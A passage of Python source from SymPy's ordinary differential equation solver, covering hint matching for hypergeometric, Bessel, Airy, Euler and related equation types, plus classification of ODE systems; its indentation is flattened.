r2 = collect(expand(dummy_eq), [df, f(x)]).match(e*df + d)
if r2:
orderd = homogeneous_order(r2[d], x, f(x))
if orderd is not None:
ordere = homogeneous_order(r2[e], x, f(x))
if orderd == ordere:
# Match arguments are passed in such a way that it
# is coherent with the already existing homogeneous
# functions.
r2[d] = r2[d].subs(f(x), y)
r2[e] = r2[e].subs(f(x), y)
r2.update({'xarg': xarg, 'yarg': yarg,
'd': d, 'e': e, 'y': y})
matching_hints["linear_coefficients"] = r2
matching_hints["linear_coefficients_Integral"] = r2
## Equation of the form y' + (y/x)*H(x^n*y) = 0
# that can be reduced to separable form
factor = simplify(x/f(x)*num/den)
# Try representing factor in terms of x^n*y
# where n is lowest power of x in factor;
# first remove terms like sqrt(2)*3 from factor.atoms(Mul)
num, dem = factor.as_numer_denom()
num = expand(num)
dem = expand(dem)
def _degree(expr, x):
# Made this function to calculate the degree of
# x in an expression. If expr will be of form
# x**p*y, (wheare p can be variables/rationals) then it
# will return p.
for val in expr:
if val.has(x):
if isinstance(val, Pow) and val.as_base_exp()[0] == x:
return (val.as_base_exp()[1])
elif val == x:
return (val.as_base_exp()[1])
else:
return _degree(val.args, x)
return 0
def _powers(expr):
# this function will return all the different relative power of x w.r.t f(x).
# expr = x**p * f(x)**q then it will return {p/q}.
pows = set()
if isinstance(expr, Add):
exprs = expr.atoms(Add)
elif isinstance(expr, Mul):
exprs = expr.atoms(Mul)
elif isinstance(expr, Pow):
exprs = expr.atoms(Pow)
else:
exprs = {expr}
for arg in exprs:
if arg.has(x):
_, u = arg.as_independent(x, f(x))
pow = _degree((u.subs(f(x), y), ), x)/_degree((u.subs(f(x), y), ), y)
pows.add(pow)
return pows
pows = _powers(num)
pows.update(_powers(dem))
pows = list(pows)
if(len(pows)==1) and pows[0]!=zoo:
t = Dummy('t')
r2 = {'t': t}
num = num.subs(x**pows[0]*f(x), t)
dem = dem.subs(x**pows[0]*f(x), t)
test = num/dem
free = test.free_symbols
if len(free) == 1 and free.pop() == t:
r2.update({'power' : pows[0], 'u' : test})
matching_hints['separable_reduced'] = r2
matching_hints["separable_reduced_Integral"] = r2
elif order == 2:
# Liouville ODE in the form
# f(x).diff(x, 2) + g(f(x))*(f(x).diff(x))**2 + h(x)*f(x).diff(x)
# See Goldstein and Braun, "Advanced Methods for the Solution of
# Differential Equations", pg. 98
s = d*f(x).diff(x, 2) + e*df**2 + k*df
r = reduced_eq.match(s)
if r and r[d] != 0:
y = Dummy('y')
g = simplify(r[e]/r[d]).subs(f(x), y)
h = simplify(r[k]/r[d]).subs(f(x), y)
if y in h.free_symbols or x in g.free_symbols:
pass
else:
r = {'g': g, 'h': h, 'y': y}
matching_hints["Liouville"] = r
matching_hints["Liouville_Integral"] = r
# Homogeneous second order differential equation of the form
# a3*f(x).diff(x, 2) + b3*f(x).diff(x) + c3
# It has a definite power series solution at point x0 if, b3/a3 and c3/a3
# are analytic at x0.
deq = a3*(f(x).diff(x, 2)) + b3*df + c3*f(x)
r = collect(reduced_eq,
[f(x).diff(x, 2), f(x).diff(x), f(x)]).match(deq)
ordinary = False
if r:
if not all([r[key].is_polynomial() for key in r]):
n, d = reduced_eq.as_numer_denom()
reduced_eq = expand(n)
r = collect(reduced_eq,
[f(x).diff(x, 2), f(x).diff(x), f(x)]).match(deq)
if r and r[a3] != 0:
p = cancel(r[b3]/r[a3]) # Used below
q = cancel(r[c3]/r[a3]) # Used below
point = kwargs.get('x0', 0)
check = p.subs(x, point)
if not check.has(oo, NaN, zoo, -oo):
check = q.subs(x, point)
if not check.has(oo, NaN, zoo, -oo):
ordinary = True
r.update({'a3': a3, 'b3': b3, 'c3': c3, 'x0': point, 'terms': terms})
matching_hints["2nd_power_series_ordinary"] = r
# Checking if the differential equation has a regular singular point
# at x0. It has a regular singular point at x0, if (b3/a3)*(x - x0)
# and (c3/a3)*((x - x0)**2) are analytic at x0.
if not ordinary:
p = cancel((x - point)*p)
check = p.subs(x, point)
if not check.has(oo, NaN, zoo, -oo):
q = cancel(((x - point)**2)*q)
check = q.subs(x, point)
if not check.has(oo, NaN, zoo, -oo):
coeff_dict = {'p': p, 'q': q, 'x0': point, 'terms': terms}
matching_hints["2nd_power_series_regular"] = coeff_dict
# For Hypergeometric solutions.
_r = {}
_r.update(r)
rn = match_2nd_hypergeometric(_r, func)
if rn:
matching_hints["2nd_hypergeometric"] = rn
matching_hints["2nd_hypergeometric_Integral"] = rn
# If the ODE has regular singular point at x0 and is of the form
# Eq((x)**2*Derivative(y(x), x, x) + x*Derivative(y(x), x) +
# (a4**2*x**(2*p)-n**2)*y(x) thus Bessel's equation
rn = match_2nd_linear_bessel(r, f(x))
if rn:
matching_hints["2nd_linear_bessel"] = rn
# If the ODE is ordinary and is of the form of Airy's Equation
# Eq(x**2*Derivative(y(x),x,x)-(ax+b)*y(x))
if p.is_zero:
a4 = Wild('a4', exclude=[x,f(x),df])
b4 = Wild('b4', exclude=[x,f(x),df])
rn = q.match(a4+b4*x)
if rn and rn[b4] != 0:
rn = {'b':rn[a4],'m':rn[b4]}
matching_hints["2nd_linear_airy"] = rn
if order > 0:
# Any ODE that can be solved with a substitution and
# repeated integration e.g.:
# `d^2/dx^2(y) + x*d/dx(y) = constant
#f'(x) must be finite for this to work
r = _nth_order_reducible_match(reduced_eq, func)
if r:
matching_hints['nth_order_reducible'] = r
# nth order linear ODE
# a_n(x)y^(n) + ... + a_1(x)y' + a_0(x)y = F(x) = b
r = _nth_linear_match(reduced_eq, func, order)
# Constant coefficient case (a_i is constant for all i)
if r and not any(r[i].has(x) for i in r if i >= 0):
# Inhomogeneous case: F(x) is not identically 0
if r[-1]:
eq_homogeneous = Add(eq,-r[-1])
undetcoeff = _undetermined_coefficients_match(r[-1], x, func, eq_homogeneous)
s = "nth_linear_constant_coeff_variation_of_parameters"
matching_hints[s] = r
matching_hints[s + "_Integral"] = r
if undetcoeff['test']:
r['trialset'] = undetcoeff['trialset']
matching_hints[
"nth_linear_constant_coeff_undetermined_coefficients"
] = r
# Homogeneous case: F(x) is identically 0
else:
matching_hints["nth_linear_constant_coeff_homogeneous"] = r
# nth order Euler equation a_n*x**n*y^(n) + ... + a_1*x*y' + a_0*y = F(x)
#In case of Homogeneous euler equation F(x) = 0
def _test_term(coeff, order):
r"""
Linear Euler ODEs have the form K*x**order*diff(y(x),x,order) = F(x),
where K is independent of x and y(x), order>= 0.
So we need to check that for each term, coeff == K*x**order from
some K. We have a few cases, since coeff may have several
different types.
"""
if order < 0:
raise ValueError("order should be greater than 0")
if coeff == 0:
return True
if order == 0:
if x in coeff.free_symbols:
return False
return True
if coeff.is_Mul:
if coeff.has(f(x)):
return False
return x**order in coeff.args
elif coeff.is_Pow:
return coeff.as_base_exp() == (x, order)
elif order == 1:
return x == coeff
return False
# Find coefficient for highest derivative, multiply coefficients to
# bring the equation into Euler form if possible
r_rescaled = None
if r is not None:
coeff = r[order]
factor = x**order / coeff
r_rescaled = {i: factor*r[i] for i in r if i != 'trialset'}
# XXX: Mixing up the trialset with the coefficients is error-prone.
# These should be separated as something like r['coeffs'] and
# r['trialset']
if r_rescaled and not any(not _test_term(r_rescaled[i], i) for i in
r_rescaled if i != 'trialset' and i >= 0):
if not r_rescaled[-1]:
matching_hints["nth_linear_euler_eq_homogeneous"] = r_rescaled
else:
matching_hints["nth_linear_euler_eq_nonhomogeneous_variation_of_parameters"] = r_rescaled
matching_hints["nth_linear_euler_eq_nonhomogeneous_variation_of_parameters_Integral"] = r_rescaled
e, re = posify(r_rescaled[-1].subs(x, exp(x)))
undetcoeff = _undetermined_coefficients_match(e.subs(re), x)
if undetcoeff['test']:
r_rescaled['trialset'] = undetcoeff['trialset']
matching_hints["nth_linear_euler_eq_nonhomogeneous_undetermined_coefficients"] = r_rescaled
# Order keys based on allhints.
retlist = [i for i in allhints if i in matching_hints]
if dict:
# Dictionaries are ordered arbitrarily, so make note of which
# hint would come first for dsolve(). Use an ordered dict in Py 3.
matching_hints["default"] = retlist[0] if retlist else None
matching_hints["ordered_hints"] = tuple(retlist)
return matching_hints
else:
return tuple(retlist)
def equivalence(max_num_pow, dem_pow):
# this function is made for checking the equivalence with 2F1 type of equation.
# max_num_pow is the value of maximum power of x in numerator
# and dem_pow is list of powers of different factor of form (a*x b).
# reference from table 1 in paper - "Non-Liouvillian solutions for second order
# linear ODEs" by L. Chan, E.S. Cheb-Terrab.
# We can extend it for 1F1 and 0F1 type also.
if max_num_pow == 2:
if dem_pow in [[2, 2], [2, 2, 2]]:
return "2F1"
elif max_num_pow == 1:
if dem_pow in [[1, 2, 2], [2, 2, 2], [1, 2], [2, 2]]:
return "2F1"
elif max_num_pow == 0:
if dem_pow in [[1, 1, 2], [2, 2], [1 ,2, 2], [1, 1], [2], [1, 2], [2, 2]]:
return "2F1"
return None
def equivalence_hypergeometric(A, B, func):
from sympy import factor
# This method for finding the equivalence is only for 2F1 type.
# We can extend it for 1F1 and 0F1 type also.
x = func.args[0]
# making given equation in normal form
I1 = factor(cancel(A.diff(x)/2 + A**2/4 - B))
# computing shifted invariant(J1) of the equation
J1 = factor(cancel(x**2*I1 + S(1)/4))
num, dem = J1.as_numer_denom()
num = powdenest(expand(num))
dem = powdenest(expand(dem))
pow_num = set()
pow_dem = set()
# this function will compute the different powers of variable(x) in J1.
# then it will help in finding value of k. k is power of x such that we can express
# J1 = x**k * J0(x**k) then all the powers in J0 become integers.
def _power_counting(num):
_pow = {0}
for val in num:
if val.has(x):
if isinstance(val, Pow) and val.as_base_exp()[0] == x:
_pow.add(val.as_base_exp()[1])
elif val == x:
_pow.add(val.as_base_exp()[1])
else:
_pow.update(_power_counting(val.args))
return _pow
pow_num = _power_counting((num, ))
pow_dem = _power_counting((dem, ))
pow_dem.update(pow_num)
_pow = pow_dem
k = gcd(_pow)
# computing I0 of the given equation
I0 = powdenest(simplify(factor(((J1/k**2) - S(1)/4)/((x**k)**2))), force=True)
I0 = factor(cancel(powdenest(I0.subs(x, x**(S(1)/k)), force=True)))
num, dem = I0.as_numer_denom()
max_num_pow = max(_power_counting((num, )))
dem_args = dem.args
sing_point = []
dem_pow = []
# calculating singular point of I0.
for arg in dem_args:
if arg.has(x):
if isinstance(arg, Pow):
# (x-a)**n
dem_pow.append(arg.as_base_exp()[1])
sing_point.append(list(roots(arg.as_base_exp()[0], x).keys())[0])
else:
# (x-a) type
dem_pow.append(arg.as_base_exp()[1])
sing_point.append(list(roots(arg, x).keys())[0])
dem_pow.sort()
# checking if equivalence is exists or not.
if equivalence(max_num_pow, dem_pow) == "2F1":
return {'I0':I0, 'k':k, 'sing_point':sing_point, 'type':"2F1"}
else:
return None
def ode_2nd_hypergeometric(eq, func, order, match):
from sympy.simplify.hyperexpand import hyperexpand
from sympy import factor
x = func.args[0]
C0, C1 = get_numbered_constants(eq, num=2)
a = match['a']
b = match['b']
c = match['c']
A = match['A']
# B = match['B']
sol = None
if match['type'] == "2F1":
if c.is_integer == False:
sol = C0*hyper([a, b], [c], x) + C1*hyper([a-c+1, b-c+1], [2-c], x)*x**(1-c)
elif c == 1:
y2 = Integral(exp(Integral((-(a+b+1)*x + c)/(x**2-x), x))/(hyperexpand(hyper([a, b], [c], x))**2), x)*hyper([a, b], [c], x)
sol = C0*hyper([a, b], [c], x) + C1*y2
elif (c-a-b).is_integer == False:
sol = C0*hyper([a, b], [1+a+b-c], 1-x) + C1*hyper([c-a, c-b], [1+c-a-b], 1-x)*(1-x)**(c-a-b)
if sol is None:
raise NotImplementedError("The given ODE " + str(eq) + " cannot be solved by"
+ " the hypergeometric method")
# applying transformation in the solution
subs = match['mobius']
dtdx = simplify(1/(subs.diff(x)))
_B = ((a + b + 1)*x - c).subs(x, subs)*dtdx
_B = factor(_B + ((x**2 -x).subs(x, subs))*(dtdx.diff(x)*dtdx))
_A = factor((x**2 - x).subs(x, subs)*(dtdx**2))
e = exp(logcombine(Integral(cancel(_B/(2*_A)), x), force=True))
sol = sol.subs(x, match['mobius'])
sol = sol.subs(x, x**match['k'])
e = e.subs(x, x**match['k'])
if not A.is_zero:
e1 = Integral(A/2, x)
e1 = exp(logcombine(e1, force=True))
sol = cancel((e/e1)*x**((-match['k']+1)/2))*sol
sol = Eq(func, sol)
return sol
sol = cancel((e)*x**((-match['k']+1)/2))*sol
sol = Eq(func, sol)
return sol
def match_2nd_2F1_hypergeometric(I, k, sing_point, func):
from sympy import factor
x = func.args[0]
a = Wild("a")
b = Wild("b")
c = Wild("c")
t = Wild("t")
s = Wild("s")
r = Wild("r")
alpha = Wild("alpha")
beta = Wild("beta")
gamma = Wild("gamma")
delta = Wild("delta")
rn = {'type':None}
# I0 of the standerd 2F1 equation.
I0 = ((a-b+1)*(a-b-1)*x**2 + 2*((1-a-b)*c + 2*a*b)*x + c*(c-2))/(4*x**2*(x-1)**2)
if sing_point != [0, 1]:
# If singular point is [0, 1] then we have standerd equation.
eqs = []
sing_eqs = [-beta/alpha, -delta/gamma, (delta-beta)/(alpha-gamma)]
# making equations for the finding the mobius transformation
for i in range(3):
if i<len(sing_point):
eqs.append(Eq(sing_eqs[i], sing_point[i]))
else:
eqs.append(Eq(1/sing_eqs[i], 0))
# solving above equations for the mobius transformation
_beta = -alpha*sing_point[0]
_delta = -gamma*sing_point[1]
_gamma = alpha
if len(sing_point) == 3:
_gamma = (_beta + sing_point[2]*alpha)/(sing_point[2] - sing_point[1])
mob = (alpha*x + beta)/(gamma*x + delta)
mob = mob.subs(beta, _beta)
mob = mob.subs(delta, _delta)
mob = mob.subs(gamma, _gamma)
mob = cancel(mob)
t = (beta - delta*x)/(gamma*x - alpha)
t = cancel(((t.subs(beta, _beta)).subs(delta, _delta)).subs(gamma, _gamma))
else:
mob = x
t = x
# applying mobius transformation in I to make it into I0.
I = I.subs(x, t)
I = I*(t.diff(x))**2
I = factor(I)
dict_I = {x**2:0, x:0, 1:0}
I0_num, I0_dem = I0.as_numer_denom()
# collecting coeff of (x**2, x), of the standerd equation.
# substituting (a-b) = s, (a+b) = r
dict_I0 = {x**2:s**2 - 1, x:(2*(1-r)*c + (r+s)*(r-s)), 1:c*(c-2)}
# collecting coeff of (x**2, x) from I0 of the given equation.
dict_I.update(collect(expand(cancel(I*I0_dem)), [x**2, x], evaluate=False))
eqs = []
# We are comparing the coeff of powers of different x, for finding the values of
# parameters of standerd equation.
for key in [x**2, x, 1]:
eqs.append(Eq(dict_I[key], dict_I0[key]))
# We can have many possible roots for the equation.
# I am selecting the root on the basis that when we have
# standard equation eq = x*(x-1)*f(x).diff(x, 2) + ((a+b+1)*x-c)*f(x).diff(x) + a*b*f(x)
# then root should be a, b, c.
_c = 1 - factor(sqrt(1+eqs[2].lhs))
if not _c.has(Symbol):
_c = min(list(roots(eqs[2], c)))
_s = factor(sqrt(eqs[0].lhs + 1))
_r = _c - factor(sqrt(_c**2 + _s**2 + eqs[1].lhs - 2*_c))
_a = (_r + _s)/2
_b = (_r - _s)/2
rn = {'a':simplify(_a), 'b':simplify(_b), 'c':simplify(_c), 'k':k, 'mobius':mob, 'type':"2F1"}
return rn
def match_2nd_hypergeometric(r, func):
x = func.args[0]
a3 = Wild('a3', exclude=[func, func.diff(x), func.diff(x, 2)])
b3 = Wild('b3', exclude=[func, func.diff(x), func.diff(x, 2)])
c3 = Wild('c3', exclude=[func, func.diff(x), func.diff(x, 2)])
A = cancel(r[b3]/r[a3])
B = cancel(r[c3]/r[a3])
d = equivalence_hypergeometric(A, B, func)
rn = None
if d:
if d['type'] == "2F1":
rn = match_2nd_2F1_hypergeometric(d['I0'], d['k'], d['sing_point'], func)
if rn is not None:
rn.update({'A':A, 'B':B})
# We can extend it for 1F1 and 0F1 type also.
return rn
def match_2nd_linear_bessel(r, func):
from sympy.polys.polytools import factor
# eq = a3*f(x).diff(x, 2) + b3*f(x).diff(x) + c3*f(x)
f = func
x = func.args[0]
df = f.diff(x)
a = Wild('a', exclude=[f,df])
b = Wild('b', exclude=[x, f,df])
a4 = Wild('a4', exclude=[x,f,df])
b4 = Wild('b4', exclude=[x,f,df])
c4 = Wild('c4', exclude=[x,f,df])
d4 = Wild('d4', exclude=[x,f,df])
a3 = Wild('a3', exclude=[f, df, f.diff(x, 2)])
b3 = Wild('b3', exclude=[f, df, f.diff(x, 2)])
c3 = Wild('c3', exclude=[f, df, f.diff(x, 2)])
# leading coeff of f(x).diff(x, 2)
coeff = factor(r[a3]).match(a4*(x-b)**b4)
if coeff:
# if coeff[b4] = 0 means constant coefficient
if coeff[b4] == 0:
return None
point = coeff[b]
else:
return None
if point:
r[a3] = simplify(r[a3].subs(x, x+point))
r[b3] = simplify(r[b3].subs(x, x+point))
r[c3] = simplify(r[c3].subs(x, x+point))
# making a3 in the form of x**2
r[a3] = cancel(r[a3]/(coeff[a4]*(x)**(-2+coeff[b4])))
r[b3] = cancel(r[b3]/(coeff[a4]*(x)**(-2+coeff[b4])))
r[c3] = cancel(r[c3]/(coeff[a4]*(x)**(-2+coeff[b4])))
# checking if b3 is of form c*(x-b)
coeff1 = factor(r[b3]).match(a4*(x))
if coeff1 is None:
return None
# c3 maybe of very complex form so I am simply checking (a - b) form
# if yes later I will match with the standerd form of bessel in a and b
# a, b are wild variable defined above.
_coeff2 = r[c3].match(a - b)
if _coeff2 is None:
return None
# matching with standerd form for c3
coeff2 = factor(_coeff2[a]).match(c4**2*(x)**(2*a4))
if coeff2 is None:
return None
if _coeff2[b] == 0:
coeff2[d4] = 0
else:
coeff2[d4] = factor(_coeff2[b]).match(d4**2)[d4]
rn = {'n':coeff2[d4], 'a4':coeff2[c4], 'd4':coeff2[a4]}
rn['c4'] = coeff1[a4]
rn['b4'] = point
return rn
def classify_sysode(eq, funcs=None, **kwargs):
r"""
Returns a dictionary of parameter names and values that define the system
of ordinary differential equations in ``eq``.
The parameters are further used in
:py:meth:`~sympy.solvers.ode.dsolve` for solving that system.
Some parameter names and values are:
'is_linear' (boolean), which tells whether the given system is linear.
Note that "linear" here refers to the operator: terms such as ``x*diff(x,t)`` are
nonlinear, whereas terms like ``sin(t)*diff(x,t)`` are still linear operators.
'func' (list) contains the :py:class:`~sympy.core.function.Function`s that
appear with a derivative in the ODE, i.e. those that we are trying to solve
the ODE for.
'order' (dict) with the maximum derivative for each element of the 'func'
parameter.
'func_coeff' (dict or Matrix) with the coefficient for each triple ``(equation number,
function, order)```. The coefficients are those subexpressions that do not
appear in 'func', and hence can be considered constant for purposes of ODE
solving. The value of this parameter can also be a Matrix if the system of ODEs are
linear first order of the form X' = AX where X is the vector of dependent variables.
Here, this function returns the coefficient matrix A.
'eq' (list) with the equations from ``eq``, sympified and transformed into
expressions (we are solving for these expressions to be zero).
'no_of_equations' (int) is the number of equations (same as ``len(eq)``).
'type_of_equation' (string) is an internal classification of the type of
ODE.
'is_constant' (boolean), which tells if the system of ODEs is constant coefficient
or not. This key is temporary addition for now and is in the match dict only when
the system of ODEs is linear first order constant coefficient homogeneous. So, this
key's value is True for now if it is available else it doesn't exist.
'is_homogeneous' (boolean), which tells if the system of ODEs is homogeneous. Like the
key 'is_constant', this key is a temporary addition and it is True since this key value
is available only when the system is linear first order constant coefficient homogeneous.
References
==========
-http://eqworld.ipmnet.ru/en/solutions/sysode/sode-toc1.htm
-A. D. Polyanin and A. V. Manzhirov, Handbook of Mathematics for Engineers and Scientists
Examples
========
>>> from sympy import Function, Eq, symbols, diff
>>> from sympy.solvers.ode.ode import classify_sysode
>>> from sympy.abc import t
>>> f, x, y = symbols('f, x, y', cls=Function)
>>> k, l, m, n = symbols('k, l, m, n', Integer=True)
>>> x1 = diff(x(t), t) ; y1 = diff(y(t), t)
>>> x2 = diff(x(t), t, t) ; y2 = diff(y(t), t, t)
>>> eq = (Eq(x1, 12*x(t) - 6*y(t)), Eq(y1, 11*x(t) + 3*y(t)))
>>> classify_sysode(eq)
{'eq': [-12*x(t) + 6*y(t) + Derivative(x(t), t), -11*x(t) - 3*y(t) + Derivative(y(t), t)], 'func': [x(t), y(t)],
'func_coeff': {(0, x(t), 0): -12, (0, x(t), 1): 1, (0, y(t), 0): 6, (0, y(t), 1): 0, (1, x(t), 0): -11, (1, x(t), 1): 0, (1, y(t), 0): -3, (1, y(t), 1): 1}, 'is_linear': True, 'no_of_equation': 2, 'order': {x(t): 1, y(t): 1}, 'type_of_equation': None}
>>> eq = (Eq(diff(x(t),t), 5*t*x(t) + t**2*y(t) + 2), Eq(diff(y(t),t), -t**2*x(t) + 5*t*y(t)))
>>> classify_sysode(eq)
{'eq': [-t**2*y(t) - 5*t*x(t) + Derivative(x(t), t) - 2, t**2*x(t) - 5*t*y(t) + Derivative(y(t), t)],
'func': [x(t), y(t)], 'func_coeff': {(0, x(t), 0): -5*t, (0, x(t), 1): 1, (0, y(t), 0): -t**2, (0, y(t), 1): 0,
(1, x(t), 0): t**2, (1, x(t), 1): 0, (1, y(t), 0): -5*t, (1, y(t), 1): 1}, 'is_linear': True, 'no_of_equation': 2,
'order': {x(t): 1, y(t): 1}, 'type_of_equation': None}
"""
# Sympify equations and convert iterables of equations into
# a list of equations
def _sympify(eq):
return list(map(sympify, eq if iterable(eq) else [eq]))
eq, funcs = (_sympify(w) for w in [eq, funcs])
for i, fi in enumerate(eq):
if isinstance(fi, Equality):
eq[i] = fi.lhs - fi.rhs
t = list(list(eq[0].atoms(Derivative))[0].atoms(Symbol))[0]
matching_hints = {"no_of_equation":i+1}
matching_hints['eq'] = eq
if i==0:
raise ValueError("classify_sysode() works for systems of ODEs. "
"For scalar ODEs, classify_ode should be used")
# find all the functions if not given
order = dict()
if funcs==[None]:
funcs = _extract_funcs(eq)
funcs = list(set(funcs))
if len(funcs) != len(eq):
raise ValueError("Number of functions given is not equal to the number of equations %s" % funcs)
# This logic of list of lists in funcs to
# be replaced later.
func_dict = dict()
for func in funcs:
if not order.get(func, False):
max_order = 0
for i, eqs_ in enumerate(eq):
order_ = ode_order(eqs_,func)
if max_order < order_:
max_order = order_
eq_no = i
if eq_no in func_dict:
func_dict[eq_no] = [func_dict[eq_no], func]
else:
func_dict[eq_no] = func
order[func] = max_order
funcs = [func_dict[i] for i in range(len(func_dict))]
matching_hints['func'] = funcs
for func in funcs:
if isinstance(func, list):
for func_elem in func:
if len(func_elem.args) != 1:
raise ValueError("dsolve() and classify_sysode() work with "
"functions of one variable only, not %s" % func)
else:
if func and len(func.args) != 1:
raise ValueError("dsolve() and classify_sysode() work with "
"functions of one variable only, not %s" % func)
# find the order of all equation in system of odes
matching_hints["order"] = order
# find coefficients of terms f(t), diff(f(t),t) and higher derivatives
# and similarly for other functions g(t), diff(g(t),t) in all equations.
# Here j denotes the equation number, funcs[l] denotes the function about
# which we are talking about and k denotes the order of function funcs[l]
# whose coefficient we are calculating.
def linearity_check(eqs, j, func, is_linear_):
for k in range(order[func] + 1):
func_coef[j, func, k] = collect(eqs.expand(), [diff(func, t, k)]).coeff(diff(func, t, k))
if is_linear_ == True:
if func_coef[j, func, k] == 0:
if k == 0:
coef = eqs.as_independent(func, as_Add=True)[1]
for xr in range(1, ode_order(eqs,func) + 1):
coef -= eqs.as_independent(diff(func, t, xr), as_Add=True)[1]
if coef != 0:
is_linear_ = False
else:
if eqs.as_independent(diff(func, t, k), as_Add=True)[1]:
is_linear_ = False
else:
for func_ in funcs:
if isinstance(func_, list):
for elem_func_ in func_:
dep = func_coef[j, func, k].as_independent(elem_func_, as_Add=True)[1]
if dep != 0:
is_linear_ = False
else:
dep = func_coef[j, func, k].as_independent(func_, as_Add=True)[1]
if dep != 0:
is_linear_ = False
return is_linear_
func_coef = {}
is_linear = True
for j, eqs in enumerate(eq):
for func in funcs:
if isinstance(func, list):
for func_elem in func:
is_linear = linearity_check(eqs, j, func_elem, is_linear)
else:
is_linear = linearity_check(eqs, j, func, is_linear)
matching_hints['func_coeff'] = func_coef
matching_hints['is_linear'] = is_linear
if len(set(order.values())) == 1:
order_eq = list(matching_hints['order'].values())[0]
if matching_hints['is_linear'] == True:
if matching_hints['no_of_equation'] == 2:
if order_eq == 1:
type_of_equation = check_linear_2eq_order1(eq, funcs, func_coef)
else:
type_of_equation = None
# If the equation doesn't match up with any of the
# general case solvers in systems.py and the number
# of equations is greater than 2, then NotImplementedError
# should be raised.
else:
type_of_equation = None
else:
if matching_hints['no_of_equation'] == 2:
if order_eq == 1:
type_of_equation = check_nonlinear_2eq_order1(eq, funcs, func_coef)
else:
type_of_equation = None
elif matching_hints['no_of_equation'] == 3:
if order_eq == 1:
type_of_equation = check_nonlinear_3eq_order1(eq, funcs, func_coef)
else:
type_of_equation = None
else:
type_of_equation = None
else:
type_of_equation = None
matching_hints['type_of_equation'] = type_of_equation
return matching_hints
def check_linear_2eq_order1(eq, func, func_coef):
x = func[0].func
y = func[1].func
fc = func_coef
t = list(list(eq[0].atoms(Derivative))[0].atoms(Symbol))[0]
r = dict()
# for equations Eq(a1*diff(x(t),t), b1*x(t) + c1*y(t) + d1)
# and Eq(a2*diff(y(t),t), b2*x(t) + c2*y(t) + d2)
r['a1'] = fc[0,x(t),1] ; r['a2'] = fc[1,y(t),1]
r['b1'] = -fc[0,x(t),0]/fc[0,x(t),1] ; r['b2'] = -fc[1,x(t),0]/fc[1,y(t),1]
r['c1'] = -fc[0,y(t),0]/fc[0,x(t),1] ; r['c2'] = -fc[1,y(t),0]/fc[1,y(t),1]
forcing = [S.Zero,S.Zero]
for i in range(2):
for j in Add.make_args(eq[i]):
if not j.has(x(t), y(t)):
forcing[i] += j
if not (forcing[0].has(t) or forcing[1].has(t)):
# We can handle homogeneous case and simple constant forcings
r['d1'] = forcing[0]
r['d2'] = forcing[1]
else:
# Issue #9244: nonhomogeneous linear systems are not supported
return None
# Conditions to check for type 6 whose equations are Eq(diff(x(t),t), f(t)*x(t) + g(t)*y(t)) and
# Eq(diff(y(t),t), a*[f(t) + a*h(t)]x(t) + a*[g(t) - h(t)]*y(t))
p = 0
q = 0
p1 = cancel(r['b2']/(cancel(r['b2']/r['c2']).as_numer_denom()[0]))
p2 = cancel(r['b1']/(cancel(r['b1']/r['c1']).as_numer_denom()[0]))
for n, i in enumerate([p1, p2]):
for j in Mul.make_args(collect_const(i)):
if not j.has(t):
q = j
if q and n==0:
if ((r['b2']/j - r['b1'])/(r['c1'] - r['c2']/j)) == j:
p = 1
elif q and n==1:
if ((r['b1']/j - r['b2'])/(r['c2'] - r['c1']/j)) == j:
p = 2
# End of condition for type 6
if r['d1']!=0 or r['d2']!=0:
return None
else:
if all(not r[k].has(t) for k in 'a1 a2 b1 b2 c1 c2'.split()):
return None
else:
r['b1'] = r['b1']/r['a1'] ; r['b2'] = r['b2']/r['a2']
r['c1'] = r['c1']/r['a1'] ; r['c2'] = r['c2']/r['a2']
if p:
return "type6"
else:
# Equations for type 7 are Eq(diff(x(t),t), f(t)*x(t) + g(t)*y(t)) and Eq(diff(y(t),t), h(t)*x(t) + p(t)*y(t))
return "type7"
def check_nonlinear_2eq_order1(eq, func, func_coef):
t = list(list(eq[0].atoms(Derivative))[0].atoms(Symbol))[0]
f = Wild('f')
g = Wild('g')
u, v = symbols('u, v', cls=Dummy)
def check_type(x, y):
r1 = eq[0].match(t*diff(x(t),t) - x(t) + f)
r2 = eq[1].match(t*diff(y(t),t) - y(t) + g)
if not (r1 and r2):
r1 = eq[0].match(diff(x(t),t) - x(t)/t + f/t)
r2 = eq[1].match(diff(y(t),t) - y(t)/t + g/t)
if not (r1 and r2):
r1 = (-eq[0]).match(t*diff(x(t),t) - x(t) + f)
r2 = (-eq[1]).match(t*diff(y(t),t) - y(t) + g)
if not (r1 and r2):
r1 = (-eq[0]).match(diff(x(t),t) - x(t)/t + f/t)
r2 = (-eq[1]).match(diff(y(t),t) - y(t)/t + g/t)
if r1 and r2 and not (r1[f].subs(diff(x(t),t),u).subs(diff(y(t),t),v).has(t) \
or r2[g].subs(diff(x(t),t),u).subs(diff(y(t),t),v).has(t)):
return 'type5'
else:
return None
for func_ in func:
if isinstance(func_, list):
x = func[0][0].func
y = func[0][1].func
eq_type = check_type(x, y)
if not eq_type:
eq_type = check_type(y, x)
return eq_type
x = func[0].func
y = func[1].func
fc = func_coef
n = Wild('n', exclude=[x(t),y(t)])
f1 = Wild('f1', exclude=[v,t])
f2 = Wild('f2', exclude=[v,t])
g1 = Wild('g1', exclude=[u,t])
g2 = Wild('g2', exclude=[u,t])
for i in range(2):
eqs = 0
for terms in Add.make_args(eq[i]):
eqs += terms/fc[i,func[i],1]
eq[i] = eqs
r = eq[0].match(diff(x(t),t) - x(t)**n*f)
if r:
g = (diff(y(t),t) - eq[1])/r[f]
if r and not (g.has(x(t)) or g.subs(y(t),v).has(t) or r[f].subs(x(t),u).subs(y(t),v).has(t)):
return 'type1'
r = eq[0].match(diff(x(t),t) - exp(n*x(t))*f)
if r:
g = (diff(y(t),t) - eq[1])/r[f]
if r and not (g.has(x(t)) or g.subs(y(t),v).has(t) or r[f].subs(x(t),u).subs(y(t),v).has(t)):
return 'type2'
g = Wild('g')
r1 = eq[0].match(diff(x(t),t) - f)
r2 = eq[1].match(diff(y(t),t) - g)
if r1 and r2 and not (r1[f].subs(x(t),u).subs(y(t),v).has(t) or \
r2[g].subs(x(t),u).subs(y(t),v).has(t)):
return 'type3'
r1 = eq[0].match(diff(x(t),t) - f)
r2 = eq[1].match(diff(y(t),t) - g)
num, den = (
(r1[f].subs(x(t),u).subs(y(t),v))/
(r2[g].subs(x(t),u).subs(y(t),v))).as_numer_denom()
R1 = num.match(f1*g1)
R2 = den.match(f2*g2)
# phi = (r1[f].subs(x(t),u).subs(y(t),v))/num
if R1 and R2:
return 'type4'
return None
def check_nonlinear_2eq_order2(eq, func, func_coef):
return None
def check_nonlinear_3eq_order1(eq, func, func_coef):
x = func[0].func
